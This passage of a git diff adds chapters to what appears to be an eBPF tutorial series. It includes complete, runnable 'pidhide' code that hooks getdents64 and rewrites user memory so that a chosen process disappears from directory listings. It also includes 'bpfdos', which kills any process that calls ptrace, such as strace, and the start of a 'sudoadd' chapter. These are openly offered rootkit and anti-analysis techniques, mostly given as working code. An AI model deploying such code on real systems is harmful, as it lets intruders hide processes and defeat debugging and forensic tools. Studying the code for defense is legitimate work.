*dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[max_pid_len]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} diff --git a/24-hide/pidhide.c b/24-hide/pidhide.c new file mode 100644 index 0000000..021d51b --- /dev/null +++ b/24-hide/pidhide.c @@ -0,0 +1,252 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "pidhide.skel.h" +#include "common.h" + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Setup Argument stuff +static struct env +{ + int pid_to_hide; + int target_ppid; +} env; + +const char *argp_program_version = "pidhide 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = + "PID Hider\n" + "\n" + "Uses eBPF to hide a process from usermode processes\n" + "By hooking the getdents64 syscall and unlinking the pid folder\n" + "\n" + "USAGE: ./pidhide -p 2222 [-t 1111]\n"; + +static const struct argp_option opts[] = { + {"pid-to-hide", 'p', "PID-TO-HIDE", 0, "Process ID to hide. Defaults to this program"}, + {"target-ppid", 't', "TARGET-PPID", 0, "Optional Parent PID, will only affect its children."}, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) + { + case 'p': + errno = 0; + env.pid_to_hide = strtol(arg, NULL, 10); + if (errno || env.pid_to_hide <= 0) + { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) + { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() +{ + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) + { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) + { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool setup() +{ + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) + { + return false; + } + + return true; +} + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Hid PID from program %d (%s)\n", e->pid, e->comm); + else + printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct pidhide_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) + { + return err; + } + if (env.pid_to_hide == 0) + { + printf("Pid Requried, see %s --help\n", argv[0]); + exit(1); + } + + // Do common setup + if (!setup()) + { + exit(1); + } + + // Open BPF application + skel = pidhide_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Set the Pid to hide, defaulting to our own PID + char pid_to_hide[10]; + if (env.pid_to_hide == 0) + { + env.pid_to_hide = getpid(); + } + sprintf(pid_to_hide, "%d", env.pid_to_hide); + strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); + skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; + skel->rodata->target_ppid = env.target_ppid; + + // Verify and load program + err = pidhide_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Setup Maps for tail calls + int index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.handle_getdents_exit); + int ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) + { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.handle_getdents_patch); + ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) + { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = pidhide_bpf__attach(skel); + if (err) + { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); + if (!rb) + { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + printf("Hiding PID %d\n", env.pid_to_hide); + while (!exiting) + { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) + { + err = 0; + break; + } + if (err < 0) + { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + pidhide_bpf__destroy(skel); + return -err; +} diff --git a/25-signal/.gitignore b/25-signal/.gitignore new file mode 100644 index 0000000..e8a99c2 --- /dev/null +++ b/25-signal/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +bpfdos diff --git a/25-signal/LICENSE b/25-signal/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/25-signal/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/25-signal/Makefile b/25-signal/Makefile new file mode 100644 index 0000000..338993f --- /dev/null +++ b/25-signal/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = bpfdos # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/25-signal/bpfdos.bpf.c b/25-signal/bpfdos.bpf.c new file mode 100644 index 0000000..4c83a41 --- /dev/null +++ b/25-signal/bpfdos.bpf.c @@ -0,0 +1,49 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +SEC("tp/syscalls/sys_enter_ptrace") +int bpf_dos(struct trace_event_raw_sys_enter *ctx) +{ + long ret = 0; + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Send signal. 9 == SIGKILL + ret = bpf_send_signal(9); + + // Log event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + return 0; +} diff --git a/25-signal/bpfdos.c b/25-signal/bpfdos.c new file mode 100644 index 0000000..062a1c9 --- /dev/null +++ b/25-signal/bpfdos.c @@ -0,0 +1,129 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "bpfdos.skel.h" +#include "common_um.h" +#include "common.h" + +// Setup Argument stuff +static struct env { + int target_ppid; +} env; + +const char *argp_program_version = "bpfdos 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"BPF DOS\n" +"\n" +"Sends a SIGKILL to any program attempting to use\n" +"the ptrace syscall (e.g. strace)\n" +"\n" +"USAGE: ./bpfdos [-t 1111]\n"; + +static const struct argp_option opts[] = { + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Killed PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm); + else + printf("Failed to kill PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct bpfdos_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = bpfdos_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Set target ppid + skel->rodata->target_ppid = env.target_ppid; + + // Verify and load program + err = bpfdos_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Attach tracepoint handler + err = bpfdos_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + printf("Sending SIGKILL to any program using the bpf syscall\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + bpfdos_bpf__destroy( skel); + return -err; +} diff --git a/25-signal/common.h b/25-signal/common.h new file mode 100644 index 0000000..ac4be7f --- /dev/null +++ b/25-signal/common.h @@ -0,0 +1,14 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/25-signal/common_um.h b/25-signal/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/25-signal/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/25-signal/index.html b/25-signal/index.html new file mode 100644 index 0000000..13c4a55 --- /dev/null +++ b/25-signal/index.html @@ -0,0 +1,213 @@ + + + + + + 使用 bpf_send_signal 发送信号终止进程 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    用 bpf_send_signal 发送信号终止恶意进程

    +

    编译:

    +
    make
    +
    +

    使用方式:

    +
    sudo ./bpfdos
    +
    +

    这个程序会对任何试图使用 ptrace 系统调用的程序,例如 strace,发出 SIG_KILL 信号。 +一旦 bpf-dos 开始运行,你可以通过运行以下命令进行测试:

    +
    strace /bin/whoami
    +
    +

    参考资料

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/26-sudo/.gitignore b/26-sudo/.gitignore new file mode 100644 index 0000000..b15967f --- /dev/null +++ b/26-sudo/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +sudoadd diff --git a/26-sudo/LICENSE b/26-sudo/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/26-sudo/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/26-sudo/Makefile b/26-sudo/Makefile new file mode 100644 index 0000000..1c2357e --- /dev/null +++ b/26-sudo/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = sudoadd # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c 